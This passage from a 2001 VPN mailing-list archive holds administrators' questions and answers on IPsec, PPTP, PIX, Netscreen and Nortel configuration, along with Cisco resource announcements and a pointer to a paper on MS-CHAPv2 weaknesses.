STATE_MAIN_I3. Possible authentication failure: no acceptable response to our first encrypted message root at ba-fw01~# ipsec auto --up road-work 102 "road-work" #2: STATE_MAIN_I1: initiate 104 "road-work" #2: STATE_MAIN_I2: from STATE_MAIN_I1; sent MI2, expecting MR2 106 "road-work" #2: STATE_MAIN_I3: from STATE_MAIN_I2; sent MI3, expecting MR3 003 "road-work" #2: SIG did not decrypt into good ECB: no leading 00. Bad key? 217 "road-work" #2: STATE_MAIN_I3: INVALID_KEY_INFORMATION 010 "road-work" #2: STATE_MAIN_I3: retransmission; will wait 20s for response 003 "road-work" #2: SIG did not decrypt into good ECB: no leading 00. Bad key? 217 "road-work" #2: STATE_MAIN_I3: INVALID_KEY_INFORMATION root at ba-fw01~# cat /proc/net/ipsec_tncfg ipsec0 -> ppp0 mtu=16260 -> 1524 ipsec1 -> NULL mtu=0 -> 0 ipsec2 -> NULL mtu=0 -> 0 ipsec3 -> NULL mtu=0 -> 0 root at fw02~# cat /proc/net/ipsec_tncfg ipsec0 -> eth2 mtu=16260 -> 1500 ipsec1 -> NULL mtu=0 -> 0 ipsec2 -> NULL mtu=0 -> 0 ipsec3 -> NULL mtu=0 -> 0 B . A s h e r IT Manager S C H U L T Z D E S I G N (636)936-2900 www.schultz-design.com _______________________________________________ firewall-wizards mailing list firewall-wizards at nfr.com http://www.nfr.com/mailman/listinfo/firewall-wizards VPN is sponsored by SecurityFocus.com From lars.troen at proxycom.no Thu Jul 19 04:21:08 2001 From: lars.troen at proxycom.no (Lars Troen) Date: Thu, 19 Jul 2001 10:21:08 +0200 Subject: Firewall-1 Information leak (fwd) In-Reply-To: <20010718173911.A19523@washington.cospo.osis.gov> Message-ID: Joe, Your last paragraph is right ;-) What I meant to say was that the default setting in firewall-1 doesn't allow unauthenticated topology downloads. But you can activate these unauthenticated topology downloads in Policy Properties (not recommended, but it's still there because of backward compability with old SecuRemote clients). The default setting in 4.0 and earlier was to respond to unauthenticated topology downloads. Lars -----Original Message----- From: Joseph S D Yao [mailto:jsdy at cospo.osis.gov] Sent: Wednesday, July 18, 2001 23:39 To: Tina Bird Cc: vpn at securityfocus.com; Lars Troen Subject: Re: Firewall-1 Information leak (fwd) On Wed, Jul 18, 2001 at 09:53:59AM -0500, Tina Bird wrote: > A correction to the earlier posting. ... > ---------- Forwarded message ---------- > Date: Wed, 18 Jul 2001 11:01:33 +0200 > From: Lars Troen ... > The default setting in 4.1SP1 (CP2000) and later is *not* to respond to > unauthenticated topology downloads. You must check the box in Policy > Properties in order to activate it. Excuse me? If it is a default setting, why do you have to check a box to activate it? [Having mulled over this for some seconds now ...] Or do you mean what you did NOT say, which is that there is a box one may check in Policy Properties to activate responding to topology downloads even if they are not authenticated? -- Joe Yao jsdy at cospo.osis.gov - Joseph S. D. Yao OSIS Center Computer Support EMT-B ----------------------------------------------------------------------- This message is not an official statement of COSPO policies. VPN is sponsored by SecurityFocus.com From bharatiabhijit at rediffmail.com Thu Jul 19 03:55:19 2001 From: bharatiabhijit at rediffmail.com (Abhijit Bharati) Date: 19 Jul 2001 07:55:19 -0000 Subject: Fw: Re: VPN-Project-Requires Hepl! Message-ID: <20010719075519.8469.qmail@mailFA8.rediffmail.com> Dear Sir/Madam, I was directed to you by Tina. Our origanal communication is as follows. Can you please help me out? Abhijit. ------------- Original Message -------------- Tina Bird wrote: To:Abhijit Bharati From:Tina Bird Date:Sat, 14 Jul 2001 12:02:39 -0500 (CDT) Subject:Re: VPN-Project-Requires Hepl! please send to vpn at securityfocus.com On 12 Jul 2001, Abhijit Bharati wrote: > Date: 12 Jul 2001 08:56:59 -0000 > From: Abhijit Bharati > To: "tbird at precision-guesswork.com" > Subject: VPN-Project-Requires Hepl! > > Dear Tina, > I am a Management student working part-time in HCL-Infinet India. HCL-Infinet an ISP and is to in the VPN service providing buisness. HCL-Infinet has 42 PoP servers in India and good contacts with the Department of Telecommunication. > In my project I have to do "Demand Forecasting" for the VPN in India. For this we did one "Market Research". Data of which is not giving us the proper results. > Such kind of projects though are new in India, I think must be done already. I just want to know whether such a kind of launching project is done by somebody to whom you can direct me. Can you please help me? > Hope you will kindy reply. > > Abhijit Bharati. > > ____________________________________________________ > Buy Feng Shui Package for Rs. 151/- only, at http://shopping.rediff.com/shopping/fengshui_mailer.htm > > > VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com ____________________________________________________ http://www.monsterindia.com - The Best Jobs. For the Best Minds. VPN is sponsored by SecurityFocus.com From sandy at storm.ca Thu Jul 19 16:33:25 2001 From: sandy at storm.ca (Sandy Harris) Date: Thu, 19 Jul 2001 16:33:25 -0400 Subject: [fw-wiz] VPN help !! please (fwd) References: Message-ID: <3B574415.280A15BC@storm.ca> Tina Bird wrote: > ---------- Forwarded message ---------- > Date: Thu, 19 Jul 2001 08:10:39 -0500 > From: Bill Asher > To: "Firewall Wizard Mailing List (E-mail)" > Subject: [fw-wiz] VPN help !! please > > I'm having a few issues getting my VPN tunnel made. Below are my config > files, I used jixen.tripod.com RoadWarrior as an example. ... It looks as though you are using Linux FreeS/WAN, so you should likely ask your questions on the FreeS/WAN users mailing list. http://lists.freeswan.org/mailman/listinfo/users VPN is sponsored by SecurityFocus.com From sandy at storm.ca Sun Jul 22 11:50:45 2001 From: sandy at storm.ca (Sandy Harris) Date: Sun, 22 Jul 2001 11:50:45 -0400 Subject: Desktop Nics with Cryptography offloading References: <0FA4FC04D3B1D411B34F0090275BE0630126D386@SM-MAIL> Message-ID: <3B5AF655.3CA1AE7A@storm.ca> Justin Funke wrote: > > I have specifically asked Intel if these "S" series NICs would offload the > encryption/decryption for standard "public" VPN's vs "LAN" encrypted > communications. > > They claim that it is not possible but I don't see how this is true. If it > is offloading IPSEC traffic how does the nic know what is public vs. private > traffic. > > http://www.intel.com/network/connectivity/resources/doc_library/data_sheets/ > pro100s.pdf > > And if it does have a way of detecting it - couldn't the traffic be > encapsulated to trick the Nic into thinking it was a local connection. An Intel staff member has recently turned up on the design discussion list for the FreeS/WAN implementation of IPSEC for Linux. He says he has patches to make FreeS/WAN work with some Intel accelerated cards. Check list archives for details: http://lists.freeswan.org/mailman/listinfo/design Description of the current state of hardware acceleration for FreeS/WAN is at: http://www.freeswan.org/freeswan_trees/freeswan-1.91/doc/compat.html#hardware More expensive alternatives might be www.redcreek.com an IPSEC gateway on a card, with its own CPU plus crypto chips www.merilus.com Merilus Firecard, a Linux firewall including IPSEC on a PCI card. VPN is sponsored by SecurityFocus.com From franci.jereb at mibo.si Sun Jul 22 16:09:49 2001 From: franci.jereb at mibo.si (Franci Jereb) Date: Sun, 22 Jul 2001 22:09:49 +0200 Subject: MS CA certificates & VPN Brick : internetworking ? Message-ID: <01C112FB.073D8C90.franci.jereb@mibo.si> Hi guys! Has anybody tried usage of Micro$oft Certificate Authority and VPN Brick 201? If so, then, please mail me! Best regards, Franci Jereb System engineer Mibo Komunikacije www.mibo.si VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Mon Jul 23 12:36:49 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Mon, 23 Jul 2001 11:36:49 -0500 (CDT) Subject: Paper on PPTP auth for wireless networks (fwd) Message-ID: For those of you contemplating PPTP over wireless networks: ---------- Forwarded message ---------- Date: Mon, 23 Jul 2001 18:20:25 +0200 (CEST) From: Wolfgang Zenker To: PEN-TEST at securityfocus.com Subject: Paper on PPTP auth for wireless networks Hello, The (german language) "Heise Newsticker" (www.heise.de) just reported the availablity of a new (english language) paper about breaking MS-PPTP Auth Extensions (MS-CHAPv2) when used on heterogenous wireless networks. Thought it might be of interest to some of the readers. It can be found at http://mopo.informatik.uni-freiburg.de/pptp_mschapv2/ Wolfgang Zenker -- Wolfgang Zenker Mail: W.Zenker at jpaves.de JPAVES Unix Online GmbH Fon: (+49) 721 / 955 40 60 Kaiserallee 87 Fax: (+49) 721 / 955 40 62 D-76185 Karlsruhe Web: www.jpaves.de ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ VPN is sponsored by SecurityFocus.com From DLeija at PENSON.COM Mon Jul 23 18:18:17 2001 From: DLeija at PENSON.COM (David Leija) Date: Mon, 23 Jul 2001 17:18:17 -0500 Subject: Inter-Corporate VPN's Message-ID: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002> We are planning to deploy Netscreen NS-5's to our clients. They will connect to our network using specified protocols with a NS-10. I'm not sure this is exclusively VPN related, but we've found that a lot of clients are going to have network architectures similar to ours or even each others. We've notice at least 60% use the 172.16.0.0 range for their internal addressing. Do Netscreens, or possibly an alternative solution, account for this possibility. We want to avoid creating multiple DMZ-NAT-DMZ layers if possible. TIA. L. David Leija Penson Financial Services dleija at penson.com (214) 765-1228 VPN is sponsored by SecurityFocus.com From jonc at nc.rr.com Mon Jul 23 21:42:09 2001 From: jonc at nc.rr.com (Jon Carnes) Date: Mon, 23 Jul 2001 21:42:09 -0400 Subject: Inter-Corporate VPN's In-Reply-To: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002> References: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002> Message-ID: <01072321420901.00984@anncons.nc.rr.com> On Monday 23 July 2001 18:18, David Leija wrote: > We are planning to deploy Netscreen NS-5's to our clients. They will > connect to our network using specified protocols with a NS-10. I'm not > sure this is exclusively VPN related, but we've found that a lot of > clients are going to have network architectures similar to ours or even > each others. We've notice at least 60% use the 172.16.0.0 range for their > internal addressing. Do Netscreens, or possibly an alternative solution, > account for this possibility. We want to avoid creating multiple > DMZ-NAT-DMZ layers if possible. TIA. > > L. David Leija > Penson Financial Services > dleija at penson.com > (214) 765-1228 > > > > VPN is sponsored by SecurityFocus.com We've had a problem with the 10.0.0.0 networks. Everyone we hook up to seems to run one. One solution is to run two IP networks on the same wire. We use 10.0.0.0 as our primary internal, and have a secondary 192.168.2.0 network that our primary servers also run. It gives us redundancy on our backbone as well as a second internally routable ip address to reach our servers. It's not perfect, but until we move to IPV6, it works. Jon Carnes MIS - HAHT Commerce VPN is sponsored by SecurityFocus.com From cspiro at dm.net.lb Tue Jul 24 07:08:57 2001 From: cspiro at dm.net.lb (Esper Choueiry) Date: Tue, 24 Jul 2001 13:08:57 +0200 Subject: PIX to PIX VPN Message-ID: <001001c11431$09ea2f20$4d02a8c0@spiro> Hello All, I'm configuring PIX to PIX VPN my VPN connection is established and the Two VPN end are having full access to each others. how can we configure the PIX so the Conduit configured can still be applied so the two VPN ends will have limited access. Regards. ____________________________________________ Esper S Choueiry Network Engineer - CCNP/CCDP Data Consult s.a.l. Tel.: + 961 1 380 378 Fax.: + 961 1 386 274 Cell.: + 961 3 370 668 e-mail: spiro at dataconsult.com.lb ____________________________________________ VPN is sponsored by SecurityFocus.com From hank_haines at hotmail.com Tue Jul 24 12:51:54 2001 From: hank_haines at hotmail.com (john Haines) Date: Tue, 24 Jul 2001 17:51:54 +0100 Subject: PIX to PIX VPN Message-ID: Try this out. The PIX is essentially configured the same as a standard IOS router for peer to peer VPN. Basically you just need to tighten the access list applied to the crypto map (ie access-list 100 in the example below) http://www.cisco.com/warp/public/110/38.html Regards, John Haines ----Original Message Follows---- From: "Esper Choueiry" Reply-To: To: Subject: PIX to PIX VPN Date: Tue, 24 Jul 2001 13:08:57 +0200 Hello All, I'm configuring PIX to PIX VPN my VPN connection is established and the Two VPN end are having full access to each others. how can we configure the PIX so the Conduit configured can still be applied so the two VPN ends will have limited access. Regards. ____________________________________________ Esper S Choueiry Network Engineer - CCNP/CCDP Data Consult s.a.l. Tel.: + 961 1 380 378 Fax.: + 961 1 386 274 Cell.: + 961 3 370 668 e-mail: spiro at dataconsult.com.lb ____________________________________________ VPN is sponsored by SecurityFocus.com _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp VPN is sponsored by SecurityFocus.com From carlsonmail at yahoo.com Tue Jul 24 15:49:05 2001 From: carlsonmail at yahoo.com (Chris Carlson) Date: Tue, 24 Jul 2001 12:49:05 -0700 (PDT) Subject: Inter-Corporate VPN's In-Reply-To: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002> Message-ID: <20010724194905.21861.qmail@web13901.mail.yahoo.com> Ah! You're running into one of the problems with IPSec VPNs. Overlapping IP address space is a huge limitation and NAT pools will only complicate the matter further in addition to causing problems with IPSec. My suggestion is thus: Don't do a workaround with your IP address space. You'll never get it right, and the next customer/partner/supplier that you link up might break it. SOLVE it by going with public addressable IP address space. Create a second DMZ with this routable space and put your servers here. This second DMZ will allow you to quickly and easily add the segment without impacting how you do your current primary DMZ. Also, if you have customers connecting to your servers, you shouldn't have them connect to the INSIDE of your network in the first place. Any compromise on the server they're allowed to go will let them access other parts of the network. Keep them separated! Oh, another way to do it is to host your servers in a Data Center (like Exodus, a qualified ISP, or other). You'll still get public IP space, you can put your NetScreen boxes there, plus you'll get the benefit of power backup, cooling, etc. Good luck to you. Please respond back to the list with what you eventually decided upon. Chris -- --- David Leija wrote: > We are planning to deploy Netscreen NS-5's to our > clients. They will connect > to our network using specified protocols with a > NS-10. I'm not sure this is > exclusively VPN related, but we've found that a lot > of clients are going to > have network architectures similar to ours or even > each others. We've notice > at least 60% use the 172.16.0.0 range for their > internal addressing. Do > Netscreens, or possibly an alternative solution, > account for this > possibility. We want to avoid creating multiple > DMZ-NAT-DMZ layers if > possible. TIA. > > L. David Leija > Penson Financial Services > dleija at penson.com > (214) 765-1228 > > > > VPN is sponsored by SecurityFocus.com > __________________________________________________ Do You Yahoo!? Make international calls for as low as $.04/minute with Yahoo! Messenger http://phonecard.yahoo.com/ VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Wed Jul 25 12:16:13 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Wed, 25 Jul 2001 11:16:13 -0500 (CDT) Subject: Issues w/ Nortel VPN In-Reply-To: <4.3.2.7.0.20010724232509.00b87550@pop.ce.mediaone.net> Message-ID: You ought to be able to re-generate them manually. If that fixes it, then a key generation problem may be your issue. I've not worked on Nortel gear -- anyone out there know what the commands are to do this? On Tue, 24 Jul 2001, Bill Yazji wrote: > Date: Tue, 24 Jul 2001 23:25:27 -0500 > From: Bill Yazji > To: Tina Bird > Subject: Re: Issues w/ Nortel VPN > > How do I ensure that the keys are being re-generated when the lifetimes expire? > > Thanks > ~Bill > > At 05:37 PM 6/6/2001, you wrote: > >Does the problem happen at a regular period, like every > >hour? Are you using dynamic key management (IKE)? If so, > >are the keys being re-generated when their lifetimes expire? > > > >And does the problem only happen with the broadband users? > >Is the cable modem or DSL gateway at their home changing IP > >address? > > > >On Wed, 6 Jun 2001, Bill Yazji wrote: > > > > > Date: Wed, 06 Jun 2001 14:17:22 -0500 > > > From: Bill Yazji > > > To: vpn at securityfocus.com > > > Subject: Issues w/ Nortel VPN > > > > > > On my corporate network, we implemented the Nortel Contivity Extranet > > switches. > > > > > > We are having issues with broadband users (mostly cable) having their > > > tunnels cease transmitting traffic. > > > > > > The Nortel software says that it is still connected, but still having > > > issues with not passing traffic. The end user has to take the tunnel down, > > > and restart to get the tunnel active again. > > > > > > Checked just about everything, and am going nuts. > > > > > > Any suggestions? > > > > > > ~Bill > > > byazji at psualum.com > > > > > > ---- > > > Bill Yazji > > > byazji at psualum.com > > > > > > "Your Choices Are Half Chance, So Are Everybody Else's" > > > "Never Under Estimate The Power Of Stupid People In Small Groups" > > > > > > ---- > > > > > > > > > VPN is sponsored by SecurityFocus.com > > > > > > >VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html > >life: http://kubarb.phsx.ukans.edu/~tbird > >work: http://www.counterpane.com > > ---- > Bill Yazji > byazji at psualum.com > > "If The Whole World Didn't Suck, We'd All Fall Off!" > "Your Choices Are Half Chance, So Are Everybody Else's" > "Never Under Estimate The Power Of Stupid People In Small Groups" > > ---- VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com VPN is sponsored by SecurityFocus.com From ng_son99 at hotmail.com Thu Jul 26 04:22:53 2001 From: ng_son99 at hotmail.com (Nguyen Son) Date: Thu, 26 Jul 2001 16:22:53 +0800 Subject: IP forwarding Question References: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002> Message-ID: Hi all, Situation: I have one IP this IP is used by (Cisco) Router 10 Workstations (win98) All work stations need to connect to the internet, now i don't have any server Now I want to setup a Win2k Server, VPN (PPTP) and NAT, I want to use a fix IP to do VPN I have talked with a staff (from IPS co. that provides us the IP) he said that he can forward IP to a port and then the VPN Server will listen to that port and handle requests accordingly and He ask me which port should it forward to ? I normally have two fix IPs to work with Questions: Is it possible to use the IP that forwards from Router for VPN service? if Yes, is there any compulsary port or I just pick one ? Is there any other solution for this situation ? TIA Son VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Fri Jul 27 19:16:02 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Fri, 27 Jul 2001 18:16:02 -0500 (CDT) Subject: FW: New Cisco VPN Resources Now Available (fwd) Message-ID: -----Original Message----- From: Cisco Technical Assistance Center [mailto:TAC_newsflash at ciscomessage.com] Sent: Friday, July 27, 2001 5:23 PM To: tbird at counterpane.com Subject: New VPN Resources Now Available ____________________________________________ Cisco Technical Assistance Center News Flash - July 27, 2001 http://www.cisco.com/tac -------------------------------------------- Introducing New VPN Resources to Answer Output, Security, and Configuration Questions ____________________________________________ Dear Cisco Customer, In response to recent customer inquiries, the Cisco Technical Assistance Center has updated the TAC Web Site to provide new and expanded Virtual Private Network (VPN) resources. Three new Cisco VPN resources provide information to fix VPN and PIX(R) configuration errors, document IP Security (IPSec) compatibilities, and illustrate PIX Firewall configurations. Enhancements to the Output Interpreter let you paste your PIX configuration into the tool via a "write term." The Output Interpreter tool checks for common VPN configuration errors in addition to regular PIX configuration errors. The Output Interpreter can be found at: http://www.cisco.com/tac/newsflash/oi_07272001_seg2.html A new Tech Note uses a matrix format to show the versions of Cisco hardware/software that support IP Sec/Point-to-Point Tunneling Protocol (IPSec/PPTP), including the following: * Cisco IOS(R) Software Releases 12.0.7T and later * Cisco VPN 3000 and 5000 Concentrators * Cisco Secure PIX Firewall and PIX Firewall Software 5.0.x through 6.0.x * Cisco Secure VPN Client 1.0 and 1.1 * Cisco VPN Client 2.5 and later * Microsoft Windows 9.x, ME, NT 4.0, and 2000 * Solaris 2.6 * Linux 2.2.14 * Mac OS 9 The matrix can be found at: http://www.cisco.com/tac/newsflash/vpn_07272001_seg2.html A new sample configuration provides information on configuring Cisco Secure PIX Firewall 6.0.x and Cisco VPN 3000 Clients using IPSec. The sample configuration shows two different versions of VPN 3000 clients connecting and encrypting traffic with the Cisco Secure PIX Firewall as the tunnel endpoint. The configuration is based on PIX Software Release 6.0.1, and Cisco VPN 3000 Client Versions 2.5 and 3.0. The Sample Configuration can be found at: http://www.cisco.com/tac/newsflash/pix_07272001_seg2.html We hope you find these TAC Web Site resources helpful. Sincerely, Cisco TAC VPN is sponsored by SecurityFocus.com From ng_son99 at hotmail.com Sat Jul 28 00:02:07 2001 From: ng_son99 at hotmail.com (Nguyen Son) Date: Sat, 28 Jul 2001 12:02:07 +0800 Subject: Filter problem References: <20010724194905.21861.qmail@web13901.mail.yahoo.com> Message-ID: Hi all, I have a win2k server (SP2) doing VPN (PPTP) I have two NICs one internal other External, this one connect directly to the internet if I accepts the default of Input Filter and Output Filter in IP Routing --> General --> External--> Properties VPN worked fine But if I follow the instructions in http://support.microsoft.com/support/kb/articles/Q255/7/84.ASP then server cannot connect to the internet and VPN client cannot connect to the server Is there hints, tips , tricks ? TIA Son VPN is sponsored by SecurityFocus.com